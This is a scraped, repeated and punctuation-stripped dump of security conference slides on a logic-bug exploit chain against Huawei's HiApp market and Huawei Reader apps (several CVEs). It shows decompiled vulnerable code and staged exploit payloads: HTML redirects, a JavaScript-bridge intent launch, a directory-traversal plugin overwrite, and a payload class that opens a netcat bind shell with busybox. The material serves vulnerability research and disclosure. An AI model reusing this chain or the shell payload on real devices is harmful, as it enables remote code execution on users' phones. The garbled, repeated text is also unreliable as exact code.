androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 16: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 17: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 18: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

